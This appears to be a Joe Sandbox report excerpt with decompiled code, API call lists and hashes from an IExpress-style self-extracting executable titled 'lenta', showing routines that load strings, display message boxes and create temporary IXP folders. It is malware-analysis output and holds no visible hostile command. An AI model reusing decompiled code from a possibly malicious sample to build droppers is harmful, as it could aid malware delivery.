                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5769
                                                                                                                                                                                                                                            0x008d5762
                                                                                                                                                                                                                                            0x008d5753
                                                                                                                                                                                                                                            0x008d574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5864
                                                                                                                                                                                                                                            0x008d5864
                                                                                                                                                                                                                                            0x008d5864
                                                                                                                                                                                                                                            0x008d5717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56c3
                                                                                                                                                                                                                                            0x008d56c5
                                                                                                                                                                                                                                            0x008d56c9
                                                                                                                                                                                                                                            0x008d56ce
                                                                                                                                                                                                                                            0x008d56d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56d6
                                                                                                                                                                                                                                            0x008d56d6
                                                                                                                                                                                                                                            0x008d56d8
                                                                                                                                                                                                                                            0x008d56dd
                                                                                                                                                                                                                                            0x008d56df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56e1
                                                                                                                                                                                                                                            0x008d56e2
                                                                                                                                                                                                                                            0x008d56e4
                                                                                                                                                                                                                                            0x008d56e6
                                                                                                                                                                                                                                            0x008d56eb
                                                                                                                                                                                                                                            0x008d56ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56f3
                                                                                                                                                                                                                                            0x008d56f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d586c
                                                                                                                                                                                                                                            0x008d5878
                                                                                                                                                                                                                                            0x008d587e
                                                                                                                                                                                                                                            0x008d5882
                                                                                                                                                                                                                                            0x008d5883
                                                                                                                                                                                                                                            0x008d5889
                                                                                                                                                                                                                                            0x008d588e
                                                                                                                                                                                                                                            0x008d588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5896
                                                                                                                                                                                                                                            0x008d56ed
                                                                                                                                                                                                                                            0x008d56df
                                                                                                                                                                                                                                            0x008d56d0
                                                                                                                                                                                                                                            0x008d56c1
                                                                                                                                                                                                                                            0x008d56a8
                                                                                                                                                                                                                                            0x008d565b
                                                                                                                                                                                                                                            0x008d565b
                                                                                                                                                                                                                                            0x008d565d
                                                                                                                                                                                                                                            0x008d5669
                                                                                                                                                                                                                                            0x008d5669
                                                                                                                                                                                                                                            0x008d565f
                                                                                                                                                                                                                                            0x008d565f
                                                                                                                                                                                                                                            0x008d5665
                                                                                                                                                                                                                                            0x008d5667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5667
                                                                                                                                                                                                                                            0x008d566c
                                                                                                                                                                                                                                            0x008d5673
                                                                                                                                                                                                                                            0x008d5678
                                                                                                                                                                                                                                            0x008d567a
                                                                                                                                                                                                                                            0x008d589b
                                                                                                                                                                                                                                            0x008d589b
                                                                                                                                                                                                                                            0x008d5680
                                                                                                                                                                                                                                            0x008d5685
                                                                                                                                                                                                                                            0x008d568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d568c
                                                                                                                                                                                                                                            0x008d567a
                                                                                                                                                                                                                                            0x008d560e
                                                                                                                                                                                                                                            0x008d5613
                                                                                                                                                                                                                                            0x008d561a
                                                                                                                                                                                                                                            0x008d5620
                                                                                                                                                                                                                                            0x008d5626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5626
                                                                                                                                                                                                                                            0x008d55db
                                                                                                                                                                                                                                            0x008d55e0
                                                                                                                                                                                                                                            0x008d55e7
                                                                                                                                                                                                                                            0x008d55f1
                                                                                                                                                                                                                                            0x008d55f6
                                                                                                                                                                                                                                            0x008d55f6
                                                                                                                                                                                                                                            0x008d55f6
                                                                                                                                                                                                                                            0x008d58b7
                                                                                                                                                                                                                                            0x008d58c7

APIs
  • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
  • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
  • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
  • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
  • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
  • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
  • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 008D55CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 008D5638
• LocalFree.KERNEL32(00000000), ref: 008D564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008D5620
  • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
  • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
  • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
• GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D56B9
• GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 008D571E
• GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 008D5737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 008D57CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 008D57EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 008D5802
                                                                                                                                                                                                                                              • Part of subcall function 008D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 008D2654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 008D5830
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FindResourceA.KERNEL32(008D0000,000007D6,00000005), ref: 008D652A
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: LoadResource.KERNEL32(008D0000,00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008D6538
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: DialogBoxIndirectParamA.USER32(008D0000,00000000,00000547,008D19E0,00000000), ref: 008D6557
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FreeResource.KERNEL32(00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008D6560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 008D5878
                                                                                                                                                                                                                                              • Part of subcall function 008D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008D59A8
                                                                                                                                                                                                                                              • Part of subcall function 008D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 008D59AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-2740620654
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0x8d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x8d9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E008D1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E008D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E008D681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E008D67C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E008D681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E008D67C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x008d45e9
                                                                                                                                                                                                                                            0x008d45ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d45f3
                                                                                                                                                                                                                                            0x008d45fd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4602
                                                                                                                                                                                                                                            0x008d45ed
                                                                                                                                                                                                                                            0x008d457e
                                                                                                                                                                                                                                            0x008d457e
                                                                                                                                                                                                                                            0x008d4580
                                                                                                                                                                                                                                            0x008d4580
                                                                                                                                                                                                                                            0x008d4583
                                                                                                                                                                                                                                            0x008d4583
                                                                                                                                                                                                                                            0x008d4585
                                                                                                                                                                                                                                            0x008d4586
                                                                                                                                                                                                                                            0x008d458a
                                                                                                                                                                                                                                            0x008d458c
                                                                                                                                                                                                                                            0x008d458f
                                                                                                                                                                                                                                            0x008d458f
                                                                                                                                                                                                                                            0x008d4591
                                                                                                                                                                                                                                            0x008d4592
                                                                                                                                                                                                                                            0x008d459b
                                                                                                                                                                                                                                            0x008d459e
                                                                                                                                                                                                                                            0x008d45a3
                                                                                                                                                                                                                                            0x008d45a9
                                                                                                                                                                                                                                            0x008d45ad
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d45af
                                                                                                                                                                                                                                            0x008d45af
                                                                                                                                                                                                                                            0x008d45bf
                                                                                                                                                                                                                                            0x008d462d
                                                                                                                                                                                                                                            0x008d4630
                                                                                                                                                                                                                                            0x008d463d
                                                                                                                                                                                                                                            0x008d464e
                                                                                                                                                                                                                                            0x008d464e
                                                                                                                                                                                                                                            0x008d463f
                                                                                                                                                                                                                                            0x008d4640
                                                                                                                                                                                                                                            0x008d4647
                                                                                                                                                                                                                                            0x008d464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d464c
                                                                                                                                                                                                                                            0x008d4666
                                                                                                                                                                                                                                            0x008d466d
                                                                                                                                                                                                                                            0x008d466f
                                                                                                                                                                                                                                            0x008d4675
                                                                                                                                                                                                                                            0x008d4675
                                                                                                                                                                                                                                            0x008d45ad
                                                                                                                                                                                                                                            0x008d4527
                                                                                                                                                                                                                                            0x008d452e
                                                                                                                                                                                                                                            0x008d453f
                                                                                                                                                                                                                                            0x008d453f
                                                                                                                                                                                                                                            0x008d4530
                                                                                                                                                                                                                                            0x008d4531
                                                                                                                                                                                                                                            0x008d4538
                                                                                                                                                                                                                                            0x008d453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d453d
                                                                                                                                                                                                                                            0x008d4554
                                                                                                                                                                                                                                            0x008d455a
                                                                                                                                                                                                                                            0x008d455a
                                                                                                                                                                                                                                            0x008d455a
                                                                                                                                                                                                                                            0x008d4525
                                                                                                                                                                                                                                            0x008d468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 008D45A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 008D45E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 008D460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 008D4630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 008D4666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008D466F
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008D686E
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: GetSystemMetrics.USER32(0000004A), ref: 008D68A7
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008D68CC
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,?,0000000C), ref: 008D68F4
                                                                                                                                                                                                                                              • Part of subcall function 008D681F: RegCloseKey.ADVAPI32(?), ref: 008D6902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                            • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                            • Opcode ID: 247fcc36ec4ffb2069b000571038f7f947bb3ffda49b11558bb0ca9e20c6dd49
                                                                                                                                                                                                                                            • Instruction ID: c23c3a9fa8f34b423701a9ddffa5f3dd2ece04f0eaec2f4b93298c1511c95cd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 247fcc36ec4ffb2069b000571038f7f947bb3ffda49b11558bb0ca9e20c6dd49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7351DF72901219ABDF219F68EC48BAA7B78FF45300F104396E95AE7345DB32DE058B60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E008D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E008D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E008D1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E008D658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E008D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0x8d8a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D171E: _vsnprintf.MSVCRT ref: 008D1750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D53FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            • API String ID: 1082909758-775753704
                                                                                                                                                                                                                                            • Opcode ID: d1ca39bb1e3b5a69fcd9e21883d63b4ee1e6591a952313df3395ce93b007ea94
                                                                                                                                                                                                                                            • Instruction ID: 552850cad453fab06808036ee69bce62fa749747534aeb4b8140aa8e5c04ac31
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1ca39bb1e3b5a69fcd9e21883d63b4ee1e6591a952313df3395ce93b007ea94
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52112271302904B7D724AB269C08FAF376DFFC1321F100327B506C2390DE748D8286A6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

